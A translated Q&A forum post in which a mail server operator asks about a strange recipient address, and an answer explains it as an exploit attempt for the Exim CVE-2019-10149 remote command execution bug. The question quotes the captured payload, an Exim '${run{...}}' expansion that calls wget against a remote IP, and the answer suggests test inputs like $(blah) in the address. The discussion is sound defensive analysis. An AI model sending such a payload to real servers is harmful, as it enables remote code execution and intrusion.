プラスサインインメールアドレス後の実行可能行を介した攻撃
私は自分のメールサーバーを運営しており、時々、スパムや不思議なものをrootアカウントに送信します。最近、私は空のメールを受け取りました。
root + $ {run {x2Fbinx2Fsht-ctx22wgetx20199.204.214.40x2fsbzx2f193.150.14.196x22}} @ mydomain.tld
その文字列の2番目のIPアドレスは、サーバーをレンタルしているのと同じホスティングサービスが所有しているようです。 runとwgetは私には非常に疑わしいように見えますが、インターネットに対するそのような攻撃については何も見つかりませんでした。
サーバーのメールログによると、そのメールは148.72.206.111から送信されました。ただし、Fromフィールドは[email protected]に設定されていました。
誰か知っていますか、これはどういう意味ですか?
これは、Exim4 SMTPサーバー(v4.87からv4.91)で最近発見されたバグを悪用する試みであり、Eximが実際には想定されていなかった特定の場所で_${variable}_置換を拡張するため、リモートコマンドの実行が可能になります。に。 (この構文は、メインのExim構成ファイルで広く使用されています。)
このバグは CVE-2019-10149 として知られています(まだ商標名やロゴはありません)。ディストリビューションからExim4を使用している場合は、すでにパッチを受け取っているはずです。 Postfixを使用しているので、そもそも影響はありません。
(とはいえ、Postfixでも、_+_の後のパラメーターは、コマンドラインの一部として頻繁に使用されます。たとえば、Procmailを呼び出す場合などです。サーバーに対していくつかのテストを実行して、次のような処理を確認することをお勧めします。 someuser+$(blah)@または_someuser+`blah`@_。)